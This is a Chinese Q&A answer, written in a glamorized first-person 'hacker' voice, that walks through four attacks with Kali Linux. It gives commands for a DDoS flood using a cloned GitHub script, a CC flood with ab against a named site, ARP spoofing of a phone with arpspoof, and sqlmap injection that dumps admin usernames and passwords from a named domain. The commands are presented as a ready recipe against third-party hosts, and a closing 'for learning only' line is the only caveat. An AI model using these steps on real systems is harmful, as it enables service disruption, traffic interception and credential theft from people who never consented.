争做黑客—学kali linux必须知道的四种网络攻击方法(DDoS、CC、ARP欺骗及SQL注入)

如题所述

第1个回答  2024-04-02


黑客之路:探索Kali Linux的四大网络攻击技术

作为一名黑客,我曾接下最具挑战的任务—黑入X网站服务器,而装备是成功的关键。此刻,我身披全黑紧身夜行衣,戴上墨镜,隐藏在暗夜的阴影中,准备用Kali Linux的尖刀,轻轻划开网络的防线。


在这个黑客的世界里,策略与技巧并重,但我更倾向于低调行事。kali Linux,我的秘密武器,将在我手中演绎一场无声的黑客交响曲。



一、DDoS洪水攻击

在命令行中,我优雅地输入:


git clone https://github.com/Andysun06/ddos

随着屏幕的提示,DDoS攻击的数据包在Kali上悄然准备就绪。进入ddos文件夹,执行


cd ddos python ddos-p2.py

然后,锁定目标IP:


ping andysun06.gitee.io

获取到IP后,输入攻击端口(通常是80)和攻击速度,按下回车,洪水攻击便如猛兽出笼,攻城略地。




二、CC攻击:狂风骤雨般的压力测试

切换到root权限,输入


sudo su

接下来,使用`ab`命令,如


ab -n 1000 -c 1000 http://bjvcrrn.nat.ipyingshe.com/bbs/

一旦界面显示出攻击效果,CC攻击的风暴便席卷而至。




三、ARP欺骗:潜伏的网络杀手

arp嗅探与欺骗开始于安装dsniff:


apt-get install dsniff

定位网卡后,用fping嗅探邻近设备:


fping -g 192.***.*.***

选定目标,如手机192.168.0.100,执行


arpspoof -i eth0 -t 192.168.0.100 192.168.0.1

手机的网络信号缓慢,证明 ARP欺骗已得逞,只需Ctrl+Z解除。




四、SQL注入:黑客的无形钥匙

从探测漏洞开始:


sqlmap -u http://tunesoman.com/product.php?id=200

一步步深入,获取数据库、表,再到字段数据,如


sqlmap -u http://www.tunesoman.com/product.php?id=200 -C admin_user_name,admin_user_pass -T admin_user -D db363851433 --batch --dump

一旦获取到用户名和密码,便能潜入服务器的核心地带。



我的黑客“探索”在此告一段落,但请记住,这些技巧仅用于学习与理解。网络安全的世界深不可测,但愿你在这次旅程中学有所获,踏上自己的Kali Linux之路。


如果你对黑客技术、Kali Linux、Linux运维或K8S等话题感兴趣,点击下方链接,继续探索更深的奥秘。